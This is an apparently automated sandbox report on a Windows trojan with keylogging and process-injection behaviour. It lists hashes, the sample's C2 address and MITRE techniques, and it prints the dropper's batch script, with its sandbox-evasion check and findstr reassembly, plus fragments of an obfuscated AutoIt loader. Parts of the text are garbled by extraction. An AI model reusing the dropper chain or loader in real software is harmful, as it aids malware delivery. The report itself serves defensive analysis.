ID: 439538 Sample Name: As47eCZnpZ Cookbook: default.jbs Time: 05:55:27 Date: 24/06/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Windows Analysis Report As47eCZnpZ 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Process Tree 4 Malware Configuration 4 Yara Overview 4 Sigma Overview 4 Signature Overview 5 AV Detection: 5 Networking: 5 Key, Mouse, Clipboard, Microphone and Screen Capturing: 5 System Summary: 5 Data Obfuscation: 5 Malware Analysis System Evasion: 5 HIPS / PFW / Operating System Protection Evasion: 5 Mitre Att&ck Matrix 5 Behavior Graph 6 Screenshots 6 Thumbnails 6 Antivirus, Machine Learning and Genetic Malware Detection 7 Initial Sample 7 Dropped Files 7 Unpacked PE Files 7 Domains 8 URLs 8 Domains and IPs 8 Contacted Domains 8 URLs from Memory and Binaries 8 Contacted IPs 8 Public 8 Private 8 General Information 8 Simulations 9 Behavior and APIs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 JA3 Fingerprints 10 Dropped Files 10 Created / dropped Files 10 Static File Info 12 General 12 File Icon 12 Static PE Info 12 General 12 Entrypoint Preview 13 Data Directories 13 Sections 13 Resources 13 Imports 13 Version Infos 13 Possible Origin 13 Network Behavior 13 Network Port Distribution 13 TCP Packets 13 UDP Packets 13 DNS Queries 13 DNS Answers 14 Code Manipulations 14 Statistics 14 Behavior 14 System Behavior 14 Analysis Process: As47eCZnpZ.exe PID: 6216 Parent PID: 5912 14 General 14 File Activities 14 File Created 14 File Deleted 14 File Written 14 File Read 14 Analysis Process: cmd.exe PID: 6424 Parent PID: 6216 15 Copyright Joe Security LLC 2021 Page 2 of 18 General 15 File Activities 15 Analysis Process: conhost.exe PID: 6464 Parent PID: 6424 15 General 15 Analysis Process: cmd.exe PID: 6516 Parent PID: 6424 15 General 15 File Activities 15 File Created 15 File Written 15 File Read 16 Analysis Process: findstr.exe PID: 6532 Parent PID: 6516 16 General 16 File Activities 16 File Written 16 Analysis Process: Bel.exe.com PID: 6552 Parent PID: 6516 16 General 16 File Activities 16 File Read 16 Analysis Process: PING.EXE PID: 6564 Parent PID: 6516 16 General 16 File Activities 17 Analysis Process: Bel.exe.com PID: 6600 Parent PID: 6552 17 General 17 File Activities 17 File Deleted 17 File Read 17 Analysis Process: nslookup.exe PID: 4532 Parent PID: 6600 17 General 17 Registry Activities 17 Key Created 17 Key Value Created 17 Disassembly 17 Code Analysis 17

Copyright Joe Security LLC 2021 Page 3 of 18 Windows Analysis Report As47eCZnpZ

Overview

General Information Detection Signatures Classification

Sample As47eCZnpZ (renamed file Name: extension from none to Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ssuubbm… exe) SMSuubbltmi AiiittttVttee dSd cssaanmnppelllere d iiises taae ckktnniooonww fnno rm saaulllwbwmaa… Analysis ID: 439538 CSCouonbntmttaaiiintntses d fffu usnnaccmtttiiioponlneaa lillisiittty ya tt toko n rrreoegwgiiinsst ttemerrra aalw llloao… MD5: 93df98db8236868… IICInnojjjeencctttatssi n aas P PfuEEn ffcfiiilltleieo iininnatttoloi t aya tfffoo rrrreeiiiggnins tpperrroo acc eelo… SHA1: b42499efc5cad69… Ransomware MInajaeccchhtisiinn eae LPLeEeaa frrrinlneiiin nigng t dode eattte efcocttrtiiieooinng nfffoo prrr r ssoaacmepp… SHA256: ad09d1a6e737f29… Maacchhiinnee LLeeaarrnniinngg ddeetteeccttiioonn ffoorr ssaampp… Miner Spreading

Tags: 32 exe OMbabffcfuuhssicncaeatt teLeded a ccroonminmg aadnneddte lllciiinntieeo nfffoo fuuonnr ddsamp mmaallliiiccciiioouusss malicious

Evader Phishing

sssuusssppiiiccciiioouusss Infos: UOUsbseefusss nncsasllltooeoodkk ucuoppm...eemxxeea tnttood q qliuuneerrr yfyo dduoonmdaaiiinnss suspicious

cccllleeaann

clean Most interesting Screenshot: UUsseess pnpiisinnlgog.o..eekxxueep t.ttoeo x ccehh eteocc kqk u tttheherey s sdtttaaotttmuussa ioon…s Exploiter Banker

UUsseess ppiiinngg...eexxee tttoo scsllhleeeeecppk the status o

Spyware Trojan / Bot WUsrrrieiittteses sp ttitono g fffo.oerrrxeeeiiigg tnno msleemepoorrryy rrreeggiiioonnss Score: 80 Adware Range: 0 - 100 AWAbbrnintoeorsrrm toaa lll f hohiriigeghihg CnC PPmUUe mUUsosaraygg ereegions

Whitelisted: false CACobonntottaariiminnsas lff fuhuningcchtttii iooCnnPaaUllliiittt yyU ttstooa cgcheheecckk iiifff aa dd… Confidence: 100% CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo cchheecckk iiifff aa dd…

CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo cchheecckk iiifff aa wdw…

CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo dcdyhynenacamk iiifcc aal llllwlyy…

CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo qdquyuenerarryym llloiocccaaallllyee…

CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo rqreeuttreriiereyvv eleo icinnaffoloe Process Tree CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo rrreetttrrriiieevvee iiinnfffoo… CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo srseiiimtruiuelllavaetttee i nkkfeeo…

System is w10x64 CCrroreenaattatteeinss s aa f uppnrrroocctcieoesnsssa liiinnty s stuuoss sppiemennuddleaedtde m koeo… As47eCZnpZ.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\As47eCZnpZ.exe' MD5: 93DF98DB8236868F5BD80EC14FE33A6C) DCDereettteaectcettteesd da T TpCCroPPc oeorrsr sUU DiDnP Ps utttrrrsaapfffffefiiicnc dooennd nn moonno… cmd.exe (PID: 6424 cmdline: 'C:\Windows\System32\cmd.exe' /c cmd < Profonda.m4a MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForcDDeeVettt1ee ccMttteeDdd5 pTp: oCoEttteAPen7 nott7tiiriaa7 UlllD ccDErrryPyEpp Atttroo7a 8fffufu2icnnE cco8tttniiBioo n4nDon7C7C33BBF8A4496) cmd.exe (PID: 6516 cmdline: cmd MD5: F3BDBE3BB6F734E357235F4D5898582D) FDFooeuutenncddt e ppdoo ttpteeonntttetiiiaanlllt issatttlrrr iicinnrggy p ddteoec cfrrruyynppctttiitiooionnn /// aa… findstr.exe (PID: 6532 cmdline: findstr /V /R '^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMEl yhYdTMciCIjdfJZ$' Folle.m4a MD5: 8B534A7FC0630DE41BB1F98C882C19EC) IIFIPPo auadndddr rrpeeossstse snseteieaenln s iiintnr i cncogon ndnneeecccrttytiiiopontni o wwniii ttt/hh a oo… Bel.exe.com (PID: 6552 cmdline: Bel.exe.com R MD5: C56B5F0201A3B3DE53E561FE76912BFD) MIPoo anndiiitttdoorrress s ccsee srrrttetaaeiiinn rrrieneg gciiisosttntrrryny e kkceetyiyossn /// wvvaiatlhlluu …o Bel.exe.com (PID: 6600 cmdline: C:\Users\user\AppData\Local\Temp\7ZipMSoofnxni.it0too0rrs0s \ cBceeerrltt.aaeixinne r.recegogimisst trRryy kMkeeDyys5s : / / C vva5al6luuB…5F0201A3B3DE53E561FE76912BFD)

nslookup.exe (PID: 4532 cmdline: C:\Windows\SysWOW64\nslookupPMP.eEEox n efffiiil ltle eoM rccsDoo cn5net:tta ar8tiiinaEnsis8n a2 arn5en 2 g iiin9insvDvtara1yllli4i iddk7 e c5cyhhDsee6 c/c7 kvk6sas1uulu5mADCB4E1B8F4EEC) PING.EXE (PID: 6564 cmdline: ping 127.0.0.1 -n 30 MD5: 70C24A306F768936563ABDADB9CA9108) PPEE fffiiilllee ccoonntttaaiiinnss sastntrra ainngvgaeel irdree scsohoueurcrcckeesssum cleanup PPEE fffiiilllee ccoonntttaaiiinnss sstttrrraannggee rrreessoouurrrcceess

PPoEottt eefinlnettti iiacaloll knkeetayyi nllloosgg sggterearrr n ddgeeettte erccetttseeoddu (((rkkceeyys ss…

SPSaoamtepnplltleiea ele xkxeecycu ulotttiiiogongn e ssrtt todopepstse wwcthheiiildllee ( pkprrerooycc ese…

SSaampplllee ffefiiillxleee iicissu ddtiiioiffffffnee rrrseetnonttpt ttsthh awannh ioloerrri iigpgiirinnoaacllel … Malware Configuration TSTrrariiiemessp tttloeo rrfreielesso oislllvv ede i fddfeoormeanaitiin nt h nnaaanm oeersisg,,, i bnbuautltt …

UTUrssieess 3t3o22 brbeiiittst PoPlEEv e fffi iilldleeossmain names, but No configs have been found UUsseess c3co2odbdeiet oPobbEfffu ufsisleccasatttiiioonn ttteecchhnniiiqquueess (((…

Uses code obfuscation techniques (

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Copyright Joe Security LLC 2021 Page 4 of 18 Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Networking:

Uses nslookup.exe to query domains

Uses ping.exe to check the status of other devices and networks

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

System Summary:

Submitted sample is a known malware sample

Data Obfuscation:

Obfuscated command line found

Malware Analysis System Evasion:

Uses ping.exe to sleep

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Writes to foreign memory regions

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command Path Process Process Input System Time Remote Input Exfiltration Encrypted Eavesdrop on Accounts and Scripting Interception Injection 2 1 2 Injection 2 1 2 Capture 1 2 1 Discovery 1 Services Capture 1 2 1 Over Other Channel 1 Insecure Interpreter 1 Network Network Medium Communication Default Native Boot or Boot or Logon Deobfuscate/Decode LSASS Memory Query Remote Archive Exfiltration Non-Standard Exploit SS7 to Accounts API 1 Logon Initialization Files or Registry 1 Desktop Collected Over Port 1 Redirect Phone Initialization Scripts Information 1 1 Protocol Data 1 Bluetooth Calls/SMS Scripts Domain At (Linux) Logon Script Logon Script Obfuscated Files or Security Account Security SMB/Windows Data from Automated Non- Exploit SS7 to Accounts (Windows) (Windows) Information 2 Manager Software Admin Shares Network Shared Exfiltration Application Track Device Discovery 2 1 Drive Layer Location Protocol 1 Local At (Windows) Logon Script Logon Script Binary Padding NTDS Process Distributed Input Capture Scheduled Application SIM Card Accounts (Mac) (Mac) Discovery 2 Component Transfer Layer Swap Object Model Protocol 1

Copyright Joe Security LLC 2021 Page 5 of 18 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Cloud Cron Network Network Logon Software Packing LSA Secrets Application SSH Keylogging Data Fallback Manipulate Accounts Logon Script Script Window Transfer Channels Device Discovery 1 Size Limits Communication

Replication Launchd Rc.common Rc.common Steganography Cached Domain Remote System VNC GUI Input Exfiltration Multiband Jamming or Through Credentials Discovery 1 1 Capture Over C2 Communication Denial of Removable Channel Service Media External Scheduled Startup Startup Items Compile After DCSync System Windows Web Portal Exfiltration Commonly Rogue Wi-Fi Remote Task Items Delivery Network Remote Capture Over Used Port Access Points Services Configuration Management Alternative Discovery 2 Protocol Drive-by Command Scheduled Scheduled Indicator Removal Proc Filesystem File and Shared Credential API Exfiltration Application Downgrade to Compromise and Scripting Task/Job Task/Job from Tools Directory Webroot Hooking Over Layer Protocol Insecure Interpreter Discovery 2 Symmetric Protocols Encrypted Non-C2 Protocol Exploit PowerShell At (Linux) At (Linux) Masquerading /etc/passwd and System Software Data Staged Exfiltration Web Protocols Rogue Cellular Public- /etc/shadow Information Deployment Over Base Station Facing Discovery 1 4 Tools Asymmetric Application Encrypted Non-C2 Protocol

Behavior Graph

Hide Legend Behavior Graph

ID: 439538 Sample: As47eCZnpZ Legend: Startdate: 24/06/2021 Architecture: WINDOWS Score: 80 Process

Multi AV Scanner detection Machine Learning detection started for submitted file for sample Signature Created File As47eCZnpZ.exe DNS/IP Info 7 Is Dropped Contains functionality to register a low level started keyboard hook Is Windows Process

cmd.exe Number of created Registry Values

1 Number of created Files

Uses ping.exe to check Submitted sample is Obfuscated command line Uses ping.exe to sleep the status of other started started a known malware sample found devices and networks Visual Basic

cmd.exe conhost.exe Delphi

3 Java

Obfuscated command line Uses ping.exe to sleep started started started .Net C# or VB.NET found C, C++ or other language Bel.exe.com PING.EXE findstr.exe

1 1 Is malicious

Internet 127.0.0.1 192.168.2.1

unknown unknown dropped unknown unknown

started C:\Users\user\AppData\Local\...\Bel.exe.com, Targa

Uses nslookup.exe to query domains

Bel.exe.com

PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvvfvACvVUZukUKtdaV

started

Uses nslookup.exe to Writes to foreign memory Injects a PE file into query domains regions a foreign processes

nslookup.exe

1

176.111.174.74, 4173, 49719 WILWAWPL Russian Federation

Screenshots

Thumbnails Copyright Joe Security LLC 2021 Page 6 of 18 This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link As47eCZnpZ.exe 13% Virustotal Browse As47eCZnpZ.exe 41% ReversingLabs Win32.Trojan.Crypzip As47eCZnpZ.exe 100% Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Copyright Joe Security LLC 2021 Page 7 of 18 Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvv unknown unknown false unknown fvACvVUZukUKtdaV

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 176.111.174.74 unknown Russian Federation 201305 WILWAWPL false

Private

IP 192.168.2.1 127.0.0.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 439538 Start date: 24.06.2021 Start time: 05:55:27 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 7m 41s Hypervisor based Inspection enabled: false Report type: light Sample file name: As47eCZnpZ (renamed file extension from none to exe) Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 24 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal80.troj.spyw.evad.winEXE@16/7@1/3

Copyright Joe Security LLC 2021 Page 8 of 18 EGA Information: Failed HDC Information: Successful, ratio: 59% (good quality ratio 57.8%) Quality average: 89.2% Quality standard deviation: 19.4% HCA Information: Failed Cookbook Comments: Adjust boot time Enable AMSI Warnings: Show All

Simulations

Behavior and APIs

Time Type Description 05:56:31 API Interceptor 1x Sleep call for process: Bel.exe.com modified

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 176.111.174.74 vMGwWrPRdu.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe 0Zru1SwgUv.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe MkN1YeVTbG.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe ldnaZ1RI6W.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe MNV60DaSww.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe UR8zlHNhnw.exe Get hash malicious Browse 176.111.1 74.74/Kill$.exe

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context WILWAWPL dUHf4W45fC.exe Get hash malicious Browse 176.111.17 4.107 vMGwWrPRdu.exe Get hash malicious Browse 176.111.174.74 djzqkrJmZC.exe Get hash malicious Browse 176.111.17 4.107 gknZtppOC6.exe Get hash malicious Browse 176.111.17 4.254 SeBVPZSYbF.exe Get hash malicious Browse 176.111.17 4.254 TFPxQL6uLU.exe Get hash malicious Browse 176.111.17 4.254 xuIDpVhTW8.exe Get hash malicious Browse 176.111.17 4.254 ALFl44K1Kg.exe Get hash malicious Browse 176.111.17 4.254 vQu9RlgOox.exe Get hash malicious Browse 176.111.17 4.254 XO1uYL6AQd.exe Get hash malicious Browse 176.111.17 4.254 0EG8l0QFdv.exe Get hash malicious Browse 176.111.174.89 daq2qi3r2X.exe Get hash malicious Browse 176.111.17 4.254

Copyright Joe Security LLC 2021 Page 9 of 18 Match Associated Sample Name / URL SHA 256 Detection Link Context Op3ra80cp6.exe Get hash malicious Browse 176.111.174.40 qY7H2JjWbU.exe Get hash malicious Browse 176.111.17 4.254 41PP9MnS6t.exe Get hash malicious Browse 176.111.17 4.254 bb4Wdn72fp.exe Get hash malicious Browse 176.111.17 4.254 FGdFl4G7Bf.exe Get hash malicious Browse 176.111.17 4.254 7DfK6MCFiI.exe Get hash malicious Browse 176.111.17 4.254 V0DNOQ8w1q.exe Get hash malicious Browse 176.111.17 4.254 2aWJvuHmxd.exe Get hash malicious Browse 176.111.17 4.254

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com

Process: C:\Windows\SysWOW64\findstr.exe File Type: Targa image data - Mono 65536 x 184 x 0 +65535 "" Category: modified Size (bytes): 893606 Entropy (8bit): 6.6201269982958335 Encrypted: false SSDEEP: 12288:5pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:5T3E53Myyzl0hMf1tr7Caw8M01 MD5: AC7E48DBA858E15A8E690D815932BB19 SHA1: BE87503D572E71FD3D66D0F9DDAD4F2CE00C1FE1 SHA-256: FB037A9D6DE82C0CD301AEEAD155EEC3127282752E1F647A5DCDD156A685E6C2 SHA-512: FCF848846A530CB6E60D79E49B51DADFD31C120E9F23DE6D89A6D9FC0CC38F29F0410E25A5F29BE5722B0BCDE15210B057D9D41E7928A3612EB53F16B7DFB00 B Malicious: true Reputation: moderate, very likely benign file Preview: ...... @...... !..L.!This program cannot be run in DOS mode....$...... sD.R.*.R.*.R.*..C..P.*....S.*[email protected].*._@....*[email protected].*.[j..[.*.[j..w.*.R.+ .r.*...... *....S.*[email protected].*.R...P.*....S.*.RichR.*...... PE..L....q.Z...... "...... @...... @...@...... @...... |...... P...... p...q...;...... [..@...... text...... `.rdata...... @[email protected]...... R...... @....rsrc...P...... <...... @[email protected]...... @..B......

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Folle.m4a Process: C:\Users\user\Desktop\As47eCZnpZ.exe File Type: data Category: dropped Size (bytes): 893707 Entropy (8bit): 6.620332197564393 Encrypted: false SSDEEP: 12288:IpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:IT3E53Myyzl0hMf1tr7Caw8M01 MD5: 62D36624C2AC3F6FB66BE6E1996DD007 SHA1: 05A99E128D9DDB52CF2941D63BEFAF9E49FFBD1C SHA-256: CBD4FDFAF795CE48124ABB0D444D939546AED39B342765203E22A60F3105BE7D SHA-512: 7161444B74D0A7193EA2B671CF08B978C1F8EFEAB7F76C30D8A08A93796625F08B0E181EF37451570A67EF30970A3863BBFA9B3A1D7B09175AD1E37DCB9C1970 Malicious: false Reputation: low

Copyright Joe Security LLC 2021 Page 10 of 18 C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Folle.m4a Preview: ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ...... @...... !..L.!This program cannot be run in DOS mode....$...... sD.R.*.R.*.R.*..C..P.*....S.*[email protected].*._@....*[email protected].*.[j..[.*.[j..w.*.R.+.r.*...... *....S.*[email protected].*.R...P.*....S .*.RichR.*...... PE..L....q.Z...... "...... @...... @...@...... @...... |...... P...... p...q...;...... [..@ ...... text...... `.rdata...... @[email protected]...... R...... @....rsrc...P...... <...... @[email protected]...... @..B......

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Profonda.m4a Process: C:\Users\user\Desktop\As47eCZnpZ.exe File Type: ASCII text, with CRLF line terminators Category: dropped Size (bytes): 281 Entropy (8bit): 5.72441813736028 Encrypted: false SSDEEP: 6:CS5IX/jHilqw+Bi39Drqj5cclUnE1Jo/2PlFAkY7loNQXSLp0n:zWXrZw339DrqNcMgcJoePDAkY7lGCS90 MD5: 85D3AE083D0C78B133F784CCBB908F49 SHA1: 0F904C97992551BE5634D36C49CB8CE91827FC9E SHA-256: 1E56025E8F519E3D6AD524D1F2D7FC05B67CC3A63B59C67AFB23CEF8719BE1B2 SHA-512: ED73C4EA577B65E229D2E7E5880D4EFAD180EC0D1D5D0273E43D864739DEBE249FF1FF4E3614D961C5F71A6AB35C374F94B8983BF71216EC4BFF02AEB6D1F89 2 Malicious: false Reputation: low Preview: if %userdomain%==DESKTOP-QO5QU33 exit 1.. Bel.exe.com..findstr /V /R "^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMl NcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ$" Folle.m4a >> Bel.exe.com"..copy Puo.m4a R..start Bel.exe.com R..ping 127.0.0.1 -n 30....

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Puo.m4a Process: C:\Users\user\Desktop\As47eCZnpZ.exe File Type: ASCII text, with very long lines, with CRLF, CR, LF line terminators Category: dropped Size (bytes): 975982 Entropy (8bit): 5.854319450048129 Encrypted: false SSDEEP: 6144:ip1S9JLZg66YHZ2eABYnEd0a2dVDMvfdydEAgG73GgZ0kmIGdWsNxnKEAXn/vu9t:W1SO6vtrdMmESmddpnHK/4iS7uCVmD0 MD5: 3920574F20EAC0217736519819A577A4 SHA1: 1C022C97B11007C00481A43C805C0E250C1F6318 SHA-256: 7611F2A46A893A9EE77B484EF7635C99F8E06AE5D235627A731FD9DBA7F3093C SHA-512: 846CBB13A922104BE08580BDF48B5DAE031C6FD8B20B4BD5C14364B7F4B1FCF539F1EEFB3B5D67E565CE23B46C09DD8910573C9540C30EB826B4965F7EFC054 1 Malicious: false Reputation: low Preview: ..Func FMHdbmYg($uVZ,$ppFfv,$KvtlIJ)..Local $JyoLEhlbigGfOndsWilHaPSHfcoIbHNKrfbwNgBrZMnwPtWXNTLCEhGUjB = 'otBZmAWknwfEIGiHGdRRlmk VEWlyPJCPkSaYbMYASSbWbgrWbFqDcJkJTGcDdRvPnmaPholTadYswgbfSgIpJYzCHIyQdclwvIbYWgIgcukyKTIEpuKwpjumyPiErzDWyXVzRmzEFzOCNgR OqAHlKpSpCXSuutkwDgZNXgMKNucPnDMRYzDCMzjW'...$wkhcFUlEtyI = 150..$ZByMiQdFqFPZBz = 81..While ((6602-6601)*6149)..Switch $wkhcFUlEtyI..Case 1 42....$gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("87_120_118_109_114_107_77_119_74_112_115_101_120_44_43_89_75_69_88_122_102_117_88_107_79_11 9_109_43_45",4)), $dSSXCUZqvPqRNG = 'LCEvpRyOexhVsaGERQtLJJLrRsKbQmeIQeoMuUYiktQDfYHI'..$175 = 138..For $nSaclIGFaQXUTXIWkKJJgyAum VmHBdgckhjskstpPRImhkkomBZcCgKask = 4 To 23..Local $JUgeQAFRiHXCa = 'tgpTnXSWmESoOSJeIFdwZVOuWFgiqDuglKUznVNkoMcJpIMNitZak'..Local $gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_120_118_123_97_92_82_85_95_96_119_78_97_4 8_50",9)), $YdDMSyTh = 'yWgSBZWDOeUyLTcYUDbQmkFKIPRAhm'..Next....$wkhc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\R Process: C:\Windows\SysWOW64\cmd.exe File Type: ASCII text, with very long lines, with CRLF, CR, LF line terminators Category: dropped Size (bytes): 975982 Entropy (8bit): 5.854319450048129 Encrypted: false SSDEEP: 6144:ip1S9JLZg66YHZ2eABYnEd0a2dVDMvfdydEAgG73GgZ0kmIGdWsNxnKEAXn/vu9t:W1SO6vtrdMmESmddpnHK/4iS7uCVmD0 MD5: 3920574F20EAC0217736519819A577A4 SHA1: 1C022C97B11007C00481A43C805C0E250C1F6318 SHA-256: 7611F2A46A893A9EE77B484EF7635C99F8E06AE5D235627A731FD9DBA7F3093C SHA-512: 846CBB13A922104BE08580BDF48B5DAE031C6FD8B20B4BD5C14364B7F4B1FCF539F1EEFB3B5D67E565CE23B46C09DD8910573C9540C30EB826B4965F7EFC054 1 Malicious: false Reputation: low

Copyright Joe Security LLC 2021 Page 11 of 18 C:\Users\user\AppData\Local\Temp\7ZipSfx.000\R Preview: ..Func FMHdbmYg($uVZ,$ppFfv,$KvtlIJ)..Local $JyoLEhlbigGfOndsWilHaPSHfcoIbHNKrfbwNgBrZMnwPtWXNTLCEhGUjB = 'otBZmAWknwfEIGiHGdRRlmk VEWlyPJCPkSaYbMYASSbWbgrWbFqDcJkJTGcDdRvPnmaPholTadYswgbfSgIpJYzCHIyQdclwvIbYWgIgcukyKTIEpuKwpjumyPiErzDWyXVzRmzEFzOCNgR OqAHlKpSpCXSuutkwDgZNXgMKNucPnDMRYzDCMzjW'...$wkhcFUlEtyI = 150..$ZByMiQdFqFPZBz = 81..While ((6602-6601)*6149)..Switch $wkhcFUlEtyI..Case 1 42....$gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("87_120_118_109_114_107_77_119_74_112_115_101_120_44_43_89_75_69_88_122_102_117_88_107_79_11 9_109_43_45",4)), $dSSXCUZqvPqRNG = 'LCEvpRyOexhVsaGERQtLJJLrRsKbQmeIQeoMuUYiktQDfYHI'..$175 = 138..For $nSaclIGFaQXUTXIWkKJJgyAum VmHBdgckhjskstpPRImhkkomBZcCgKask = 4 To 23..Local $JUgeQAFRiHXCa = 'tgpTnXSWmESoOSJeIFdwZVOuWFgiqDuglKUznVNkoMcJpIMNitZak'..Local $gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_120_118_123_97_92_82_85_95_96_119_78_97_4 8_50",9)), $YdDMSyTh = 'yWgSBZWDOeUyLTcYUDbQmkFKIPRAhm'..Next....$wkhc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Sfaldavano.m4a

Process: C:\Users\user\Desktop\As47eCZnpZ.exe File Type: data Category: dropped Size (bytes): 212992 Entropy (8bit): 7.999103891298141 Encrypted: true SSDEEP: 6144:7FnNA0Jy8tpv/G5phjDeRUbo+KUMyNiVt6NC1:7FN3pXG9jDeavN2tiC1 MD5: AD0CEE9C167ACAECFEE67E32C1E53A95 SHA1: 57C8C7FE1F1A75217F269BF00563E56E9DD694BE SHA-256: 842764050803468DDBD46DF063AA2EE1952598406E3784CDCA57BAEBA21D6775 SHA-512: C3E88F8F89EF5258D9F49FB10342D6883788EA4322AA9B7AA43E619145E87259AEBE42E2D9E9F1A5A01D9729EDF6FF345BC74583EB62206E798DC7047B642634 Malicious: false Preview: @6...*\...R...G..R.9.. ...'...... C...... 1..Jqa....[Y...Ob^.B.5 .{ .qG.*...."..../..4 Bu.a...,...T...s..t..$..m...*.b_#..I..MG...a<.y...&q...G....l...... Y.a.:.}N.F..'..'.]...s..&j.:.:$.....?.P...= .x....X.Uf.hm....G[..Y....z....K.Wh([email protected]...}c&n..q{u..[UY.(g.\.....C.:-..5....OJZt...... @.O..d.u.w.9....D.....c.....S){O...... !sm....*n.2.xz.Y...]...:. ..v.2...... \.J...?..f.Z...... *o0D.~.cD.n.d;s.LB.)...... <6.~....w...ZhZ.VF.q..|..b..j.k.._..X..;i_{.F?.G.....1....A.`%..x%...U@.[... H?#..I8a.dR.{....E,G...-...[...... c...wx..|..w*..Q....Y v.IL.b..V!.....*.5Th;o.^.:..f5....'...F:".....J.3"dW:....<...g..I.A..7S.).i.7.(...<...r.....,#..u{hR.#.8.*.{..f4....L...... v..y...... =...*.. ...Xgi.T{q...U.U..*]~OA..]...T.K.;..V.!..L...... ua.N....w-..$ .....v..EL.L.. ...9...... 3[2...... *..>>...)-..].zW.B.w...0z3...Dw.}...... E..Lv..K).\.-.~..~C.T.G.6..N/|.....X/.[.m..|]G.+...4l.....Zu.c.].h...... [.y...U..."&..BK

Static File Info

General File type: PE32 executable (GUI) Intel 80386, for MS Windows Entropy (8bit): 7.671481217690432 TrID: Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00% File name: As47eCZnpZ.exe File size: 1521629 MD5: 93df98db8236868f5bd80ec14fe33a6c SHA1: b42499efc5cad69836bfd85e226bc088d62f05fe SHA256: ad09d1a6e737f2900eb85a8f92092d4c9065ba7b94902dc 78ab900cbff166e82 SHA512: 1faf66b7eaeeb89ae18be3aae8641107b3c7f54a1fa0aa6 84bd9bc864143832ff3568d0cc4ebd45ebe026c7e9fc613 4c2dda976d24ac69ce0814e2af615f6759 SSDEEP: 24576:JChmYDQDXULmCiIhekpMYVBgqrQyTIhBri4oN GxL2GbPo8P9XT:JbSQDb8/V4yklSGxL2sT9XT File Content Preview: MZ`...... @...... `...... !..L.!R equire Windows..$PE..L...... V...... `...... @...... p. .\......

File Icon

